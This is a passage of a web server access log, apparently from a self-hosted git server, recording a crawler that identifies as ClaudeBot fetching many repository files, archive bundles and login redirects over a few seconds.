Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 216.73.216.188] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 216.73.216.188] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log?display=rendered" [Client 216.73.216.188] [Length 10923] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs?display=rendered" [Client 216.73.216.188] [Length 10940] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 216.73.216.188] [Length 14386] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log?display=source" [Client 216.73.216.188] [Length 10956] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json?display=rendered" [Client 216.73.216.188] [Length 10978] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12733] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 216.73.216.188] [Length 1546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 11372] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10846] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 9917] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 216.73.216.188] [Length 10113] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.bundle" [Client 216.73.216.188] [Length 12782434] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 216.73.216.188] [Length 11042] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py?display=source" [Client 216.73.216.188] [Length 21512] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" [Client 216.73.216.188] [Length 10330] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 13006] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 216.73.216.188] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=rendered" [Client 216.73.216.188] [Length 10999] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 20991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py?display=rendered" [Client 216.73.216.188] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fdata%2Fdatabase.sqlite" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10806] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/launch.json?display=rendered" [Client 216.73.216.188] [Length 11090] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.bundle" [Client 216.73.216.188] [Length 330354] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" [Client 216.73.216.188] [Length 11440] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" [Client 216.73.216.188] [Length 10139] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 15883] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log?display=source" [Client 216.73.216.188] [Length 15269] [Gzip 6.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest%2Fglobal.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 216.73.216.188] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3%2F.gitignore" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 216.73.216.188] [Length 52830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile?display=source" [Client 216.73.216.188] [Length 12436] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3?display=source" [Client 216.73.216.188] [Length 11057] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity%2Fcode-frequency" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=rendered" [Client 216.73.216.188] [Length 10965] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?display=rendered" [Client 216.73.216.188] [Length 11101] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 216.73.216.188] [Length 3389] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 216.73.216.188] [Length 9834] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py?display=source" [Client 216.73.216.188] [Length 13357] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 216.73.216.188] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json?display=source" [Client 216.73.216.188] [Length 12760] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py?display=source" [Client 216.73.216.188] [Length 12935] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 216.73.216.188] [Length 9836] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10842] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 216.73.216.188] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log?display=rendered" [Client 216.73.216.188] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json?display=rendered" [Client 216.73.216.188] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python?display=source" [Client 216.73.216.188] [Length 11048] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py?display=source" [Client 216.73.216.188] [Length 12963] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 216.73.216.188] [Length 10956] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log?display=source" [Client 216.73.216.188] [Length 14758] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log?display=source" [Client 216.73.216.188] [Length 12340] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json?display=rendered" [Client 216.73.216.188] [Length 10967] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr 